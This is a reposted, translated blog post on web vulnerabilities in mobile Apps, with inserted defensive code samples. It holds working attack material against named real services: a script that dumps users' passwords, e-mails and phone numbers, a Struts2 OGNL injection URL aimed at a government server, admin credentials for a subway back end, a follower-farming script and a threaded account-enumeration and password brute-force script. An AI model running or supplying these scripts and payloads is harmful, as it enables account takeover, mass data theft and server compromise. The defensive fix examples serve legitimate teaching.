Common Web vulnerabilities in mobile Apps
Reposted from: http://www.dickeye.com/?id=16
Mainly mobile APP vulnerabilities, tested from the web side; learned a lot.
Smartphones have shifted netizens' lives from the PC towards mobile; today nearly all of a user's daily needs can be met with a single phone. Food delivery, office work, social networking, bank transfers and so on can all be done through mobile Apps. This brings many information security problems with it: large amounts of user data are stored in mobile Apps, mobile App development is often immature, and user data leaks caused by mobile Apps appear one after another.
Web-type vulnerabilities in mobile Apps fall mainly into the following categories:

1. SQL injection

This is the most common vulnerability type of all. Because of the nature of Apps, developers assume that details such as the URL cannot be obtained while the App is in use, and so neglect to write injection protection into the App.
For example:
Qiushibaike SQL injection at one location could leak 15 million users' information
http://loudong.360.cn/vul/info/qid/QTVA-2015-177818
Quanfeng Express injection vulnerability: server users could be created directly, and all kinds of order and user data leaked
http://loudong.360.cn/vul/info/qid/QTVA-2014-106574
Yonghui Superstores App SQL injection leads to leak of store and user information
http://loudong.360.cn/vul/info/qid/QTVA-2014-106385
Social App “小濕妹” hole at one location, database compromised
http://loudong.360.cn/vul/info/qid/QTVA-2015-179315
Style-boosting App “交換” database compromised, user information leaked
http://loudong.360.cn/vul/info/qid/QTVA-2015-177968

All of these arise because App development overlooked the possibility of SQL injection in the interfaces, including POST injection, GET injection, COOKIE injection and so on.
Taking the Qiushibaike injection as a detailed example:
Capturing the request when querying a user's details, the packet content is as follows:

```http
GET /user/6122886/detail?rqcnt=12&r=dec363d71423481245949 HTTP/1.1
User-Agent: qiushibalke_6.2.0_WIFI_auto_7
Source: android_6.2.0
Model: Xiaomi/cancro_wc_lte/cancro:4.4.4/KTU84P/V6.3.3.0.KXDCNBL:user/release-keys
Qbtoken: 929efcfa9875f584f9f4db17343d16d7b1ec404b
Uuid: IMEI_2af2c2beee1dbd00d3436cffdec363d7
Deviceidinfo: {"DEVICEID":"99000566573203","RANDOM":"","ANDROID_ID":"2e6990c574abdd57","SIMNO":"89860313100285780111'","IMSI":"460031219452851","SERIAL":"5d999491","MAC":"0c:1d:af:db:07:9c","SDK_INT":19}
Host: nearby.qiushibaike.com
Connection: Keep-Alive
Accept-Encoding: gzip
```

The Qbtoken header parameter is injectable.
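The defect class behind the Qbtoken header, shown as an added example (not code from the original post or from the vulnerable server): a lookup that splices the header value into SQL text next to the same lookup with a bound parameter, plus an edge check that rejects anything not shaped like the App's 40-hex-character token. The table and rows are constructed for the example.

```python
import sqlite3

# Constructed stand-in for the server's user table; the real schema is not on the page.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, qbtoken TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "alice", "tok-alice"), (2, "bob", "tok-bob")])
    return conn

def lookup_vulnerable(conn, qbtoken):
    # The header value is spliced into the SQL text, so a quote in Qbtoken rewrites the query.
    sql = "SELECT id, name FROM users WHERE qbtoken = '%s'" % qbtoken
    return conn.execute(sql).fetchall()

def lookup_safe(conn, qbtoken):
    # Bound parameter: the driver passes the token as data and it can never become SQL.
    return conn.execute("SELECT id, name FROM users WHERE qbtoken = ?", (qbtoken,)).fetchall()

def looks_like_app_token(qbtoken):
    # Second layer, in front of the database: the App's tokens are 40 lowercase hex
    # characters (see the capture above), so anything else is rejected at the edge.
    return len(qbtoken) == 40 and all(c in "0123456789abcdef" for c in qbtoken)
```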
2. Arbitrary user registration

This class of vulnerability does not directly leak user information, but a malicious hacker could use it to register any phone number and then use that registered account to social-engineer the number owner's friends or family.
Vulnerability cases:

App “tataufo” vulnerability at one location allows changing any user's password
http://loudong.360.cn/vul/info/qid/QTVA-2015-192209
App “約飯” arbitrary user registration
http://loudong.360.cn/vul/info/qid/QTVA-2015-193610
App “樓樓” arbitrary user registration
http://loudong.360.cn/vul/info/qid/QTVA-2015-193622

Most arbitrary-registration vulnerabilities come from a weak verification-code mechanism and lax validation during the registration process. In the App “約飯” case, the verification code value was returned directly in the response to the registration request.

In the App “樓樓” case, the registration flow has four steps:
(1) Register: enter the phone number and send the request for a verification code.
(2) Receive the verification code and enter it.
(3) Submit and verify the code, then proceed to the profile step.
(4) Fill in the user profile and complete registration.
The problem is in the fourth step: perform the first three steps normally, then in step four change the phone number in the profile to any number, and that number gets registered.

3. User information leakage
This type of vulnerability mostly exists where user profiles are viewed: because of sloppy coding, querying a user's profile returns private information such as the account e-mail, phone number, password and so on.
For example:
App “嘰友” leaks user information
http://loudong.360.cn/vul/info/qid/QTVA-2015-193589
Duang~ App “小柚” user information leak, with verification script (password, e-mail, phone number)
http://loudong.360.cn/vul/info/qid/QTVA-2015-187508
Qiushibaike leaks user information at one location
http://loudong.360.cn/vul/info/qid/QTVA-2015-177827
Taking App “小柚” as an example:

Accessing a user's profile directly returns sensitive information: password, e-mail, phone number.
A Python script was written to dump user information:
```python
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# author=Hydra_Tc
# create=20150227
import os
import json
import random
import requests
import threadpool as tp
def baopo():
    flag = 0
    userid = 0
    while True:
        flag += 1
        userid += 1
        data = {'userid' : userid,}
        api_url = 'http://app.hixiaoyou.com/User/Me/getuserinfo'
        my_string = "userid"
        try:
            print '[%s] Test Userid: %s' % (flag, userid)
            req = requests.post(api_url, data=data, timeout=5)
            req_id = json.loads(req.content)['userid']
            req_mail = json.loads(req.content)['email']
            req_mobile = json.loads(req.content)['mobile']
            req_qq = json.loads(req.content)['QQ']
            req_pass = json.loads(req.content)['password']
        except:
            req_status = 0
        if my_string in req.json():
            success_f = open('./success_user1.txt', 'a+')
            success_f.write('%s--%s--%s--%s--%s\n'%(req_id,req_qq,req_mobile,req_mail,req_pass))
            success_f.close()

if __name__ == '__main__':
    baopo()
    pool = tp.ThreadPool(100)
    reqs = tp.makeRequests(baopo)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
```

The results are as follows:
[screenshot of the dumped results]

4. Framework problems (Struts2 etc.)

These are not numerous, but they must not be overlooked.
Two vulnerabilities in the news management system of the National Bureau of Statistics mobile site
http://loudong.360.cn/vul/info/qid/QTVA-2014-113456
App “將愛” vulnerability can lead to server compromise and leak of user information
http://loudong.360.cn/vul/info/qid/QTVA-2015-193592

The National Bureau of Statistics mobile news management system vulnerability is as follows:
http://219.235.129.108:8080/NewManager/admin/login.action?redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D
5. Weak back-end passwords
Because the URLs of App sites are not very visible, administrators are also rather casual about back-end paths and passwords.
For example:
Beijing subway station news back-end management system compromised
http://loudong.360.cn/vul/info/qid/QTVA-2014-124853

Packet capture revealed
http://119.254.65.181/SubwayManagement/webservice/SubwayService
Walking up the directory tree gives
http://119.254.65.181/SubwayManagement/ and http://119.254.65.181/
two back-end systems; the former has the weak credentials admin/admin and admin/beijingditieAppadmin.

6. Authorization vulnerabilities
This vulnerability is second only to SQL injection in frequency.
App “逗萌” improper design at one location (with verification script)
http://loudong.360.cn/vul/info/qid/QTVA-2015-192485
Social App “足記” vulnerability bundle
http://loudong.360.cn/vul/info/qid/QTVA-2015-178379
App “tataufo” vulnerability at one location allows changing any user's password
http://loudong.360.cn/vul/info/qid/QTVA-2015-192209

Taking the App “逗萌” improper design as an example:
The App's follow-user function performs no validation at all:

```http
POST /HC_AppClient/client-method/followUser.json HTTP/1.1
Content-Length: 39
Content-Type: application/x-www-form-urlencoded
Host: 115.29.5.49:80
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

fromUserId=14004049&toUserId=1398055700
```
A script was written to start farming followers:
```python
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# author=Hydra_Tc
# create=20150306
import os
import json
import random
import requests
import threadpool as tp
def baopo():
    flag = 1
    fromUserId = 13980556
    while True:
        flag += 1
        fromUserId += 1
        data = {'fromUserId' : fromUserId,
                'toUserId' : '13980556',}
        api_url = 'http://115.29.5.49/HC_APPClient/client-method/followUser.json'
        my_string = "body"
        try:
            print '[%s] Test Userid: %s' % (flag, fromUserId)
            req = requests.post(api_url, data=data, timeout=5)
        except:
            req_status = 0
        if my_string in req.json():
            success_f = open('./success_user1.txt', 'a+')
            success_f.write('%s\n'%(fromUserId))
            success_f.close()

if __name__ == '__main__':
    baopo()
    pool = tp.ThreadPool(100)
    reqs = tp.makeRequests(baopo)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
```
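The two authorization defects on this page, the 小柚 profile endpoint that returns password, e-mail and phone for any userid (section 3) and the 逗萌 followUser request that trusts a client-supplied fromUserId, handled the way a server should, as an added example (not code from the original post or from either App): the caller's identity comes from the session, the profile response is built from a field allow-list, and fromUserId in the form body is simply ignored. The session table, user records and field names are constructed for the example.

```python
# Constructed in-memory data for this example; the field names follow the
# getuserinfo response and followUser request shown above, the values are made up.
USERS = {
    1: {"userid": 1, "nickname": "alice", "email": "alice@example.invalid",
        "mobile": "13800000001", "QQ": "10001", "password_hash": "<hash>"},
    2: {"userid": 2, "nickname": "bob", "email": "bob@example.invalid",
        "mobile": "13800000002", "QQ": "10002", "password_hash": "<hash>"},
}
SESSIONS = {"sess-alice": 1, "sess-bob": 2}   # session token -> authenticated user id
FOLLOWS = set()                                # (follower, followed)

PUBLIC_FIELDS = ("userid", "nickname")
OWNER_FIELDS = PUBLIC_FIELDS + ("email", "mobile", "QQ")   # the password hash is never serialized

def get_user_info(session, userid):
    # Who is asking comes from the session; what is returned comes from an allow-list,
    # so a profile lookup for another userid can only ever yield the public fields.
    caller = SESSIONS.get(session)
    user = USERS.get(userid)
    if caller is None or user is None:
        return {"error": "unauthorized"}
    fields = OWNER_FIELDS if caller == userid else PUBLIC_FIELDS
    return {k: user[k] for k in fields}

def follow_user(session, form):
    # The follower is the authenticated caller; a fromUserId in the form body is ignored,
    # so the request can no longer act on behalf of an arbitrary account.
    caller = SESSIONS.get(session)
    if caller is None:
        return {"error": "unauthorized"}
    try:
        to_user = int(form.get("toUserId", ""))
    except ValueError:
        return {"error": "invalid toUserId"}
    if to_user not in USERS or to_user == caller:
        return {"error": "invalid toUserId"}
    FOLLOWS.add((caller, to_user))
    return {"body": "ok", "fromUserId": caller, "toUserId": to_user}
```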

7. Unrestricted interface leads to credential stuffing

Actually I only started paying attention to this type after seeing the Meipai vulnerability posted by Mogu Niu; luckily I found one of the same type within two or three days.

App “瘋拍” two vulnerabilities bundled, with verification script
http://loudong.360.cn/vul/info/qid/QTVA-2015-185861

瘋拍 has two vulnerabilities; only the unrestricted interface leading to credential stuffing is shown here.
Logging in with an unregistered phone number returns:
```json
{"success":false,"error":"\u8be5\u53f7\u7801\u5c1a\u672a\u6ce8\u518c\uff0c\u8bf7\u5148\u6ce8\u518c"}
```
(decoded: "This number is not registered yet, please register first")

It reports that the number is not registered. Logging in with a registered user, if the password is wrong it returns:
```json
{"success":false,"error":"\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3"}
```
(decoded: "Wrong password, think again"). If the password is correct:
```json
{"success":true,"data":{"data":{"ucookie":"19151821c062f8a0252dc3a951940b8dc5a238188447a260b145e1e40fc3d48d9","username":"1234566666","avatar":"","level":0,"score":0,"setting":"{}","uid":16942,"nickname":"1234566666","t":1424918536},"expire":false}}
```
This contains the cookie and related information. So with a few small changes to Mogu's script the brute force can be done.
The script is as follows, with comments added:
```python
#!/usr/bin/env python
# _*_ coding: utf-8 _*_
# author=Hydra_Tc
# create=20150224S
import json
import random
import requests
import threadpool as tp
def _burp(mobile):  # check whether the password is correct
    for password in ['qwertyu','123456', '123456789', '000000', mobile,'1234567','12345678','1234567890']:  # weak passwords
        api_url = 'http://aifengpai.com/api/user/login'   # login interface
        data = {'mobile': mobile,
                'did':'c71c53fa20c38d4a14ae8245bac9bb99',
                'password': password,}   # login parameters, simplified here with unnecessary parameters removed
        try:
            print '[*] Burp mobile: %s' % mobile
            req = requests.post(api_url, data=data, timeout=5)  # POST request via the requests module
        except:
            continue
        try:
            success = json.loads(req.content)['data']
            burp_success = open('./fengpai_account.txt', 'a+')  # created on the first success; successful data is written here
            burp_success.write('%s:::%s\n'%(mobile, password))
            burp_success.close()
            print success
            return success
        except:
            success = 0
            print '[-] Burp False'
            continue
def _status(args):  # check whether the phone number is registered
    flag = 0
    list = "0123456789"
    sa = []
    for i in range(8):  # length 8; changed Mogu Niu's range construction, testing felt slightly faster
        sa.append(random.choice(list))
    while True:
        flag += 1
        # phone number prefix
        account_test = random.choice(['138','130','133','135','138','139','150','152','155','159','180','181','182','185','187','189']) \
                       + ''.join(sa)
        data = {'mobile': account_test,
                'did':'c71c53fa20c38d4a14ae8245bac9bb99',
                'password': 'jhjhksd'}
        api_url = 'http://aifengpai.com/api/user/login'
        try:
            print '[%s] Test account: %s' % (flag, account_test)
            req = requests.post(api_url, data=data, timeout=3)
            req_status = json.loads(req.content)['error']  # extract the error field from the response
        except:
            req_status = 0
        if req_status == u'\u5bc6\u7801\u9519\u8bef\uff0c\u518d\u4ed4\u7ec6\u60f3\u60f3':  # equal means the account exists
            success_f = open('./fp_phone.txt', 'a+')
            success_f.write('%s\n'%account_test)
            success_f.close()
            _burp(account_test)
            print '\n[OK] account: %s\n' % account_test
if __name__ == '__main__':
    args = []
    for i in range(30):
        args.append(args)
    pool = tp.ThreadPool(30)
    reqs = tp.makeRequests(_status, args)
    [pool.putRequest(req) for req in reqs]
    pool.wait()
```
I changed Mogu Niu's random number generation.
Because this App does not have as many users as Meipai, brute forcing it is a bit hard, so during testing I changed `list` in the test-range function to `list = "8"` and the first three digits of the phone number to `account_test = random.choice(['138'])`, so that only 13888888888 is generated (this number had been registered during testing before submission).
The brute-force result is as follows:
[screenshot of the brute-force result]
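The two properties the 瘋拍 login interface lacked, one response for "not registered" and "wrong password" and a limit on attempts, shown as an added example of a login handler (not code from the original post or from the App): every attempt is charged to both the phone number and the calling client before the check, unknown numbers are hashed against a dummy record so they are indistinguishable from wrong passwords, and the budget resets after a window. The store, limits and function names are assumptions for the example.

```python
import hashlib
import hmac
import os
import time

# Constructed in-memory account store for this example (not the App's backend).
USERS = {}                                     # mobile -> (salt, pbkdf2 hash)
_DUMMY = (os.urandom(16), b"\x00" * 32)        # used for unknown numbers so the work done is the same
GENERIC_ERROR = {"success": False, "error": "wrong mobile number or password"}
THROTTLED = {"success": False, "error": "too many attempts, try again later"}
MAX_ATTEMPTS, WINDOW = 5, 600                  # attempts allowed per key inside a 10-minute window
_attempts = {}                                 # "m:<mobile>" / "c:<client>" -> recent timestamps

def _hash(password, salt):
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)

def register(mobile, password):
    salt = os.urandom(16)
    USERS[mobile] = (salt, _hash(password, salt))

def _over_budget(key, now):
    recent = [t for t in _attempts.get(key, []) if now - t < WINDOW]
    recent.append(now)
    _attempts[key] = recent
    return len(recent) > MAX_ATTEMPTS

def login(mobile, password, client_id, now=None):
    now = time.time() if now is None else now
    # Charge the attempt to both the target number and the calling client before anything
    # else; '|' rather than 'or' so both counters update. A script walking through numbers
    # with one password exhausts the client budget, one walking passwords exhausts the number's.
    if _over_budget("m:" + mobile, now) | _over_budget("c:" + client_id, now):
        return THROTTLED
    salt, stored = USERS.get(mobile, _DUMMY)
    # Unregistered number and wrong password get the identical response, so the
    # "not registered" vs "wrong password" distinction used for enumeration above is gone.
    # The hash is computed first so an unknown number costs the same as a known one.
    ok = hmac.compare_digest(stored, _hash(password, salt)) and mobile in USERS
    return {"success": True, "data": {"username": mobile}} if ok else GENERIC_ERROR

register("13800000001", "correct horse")       # constructed test account
```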
Reposted from: https://www.cnblogs.com/dongchi/p/4466951.html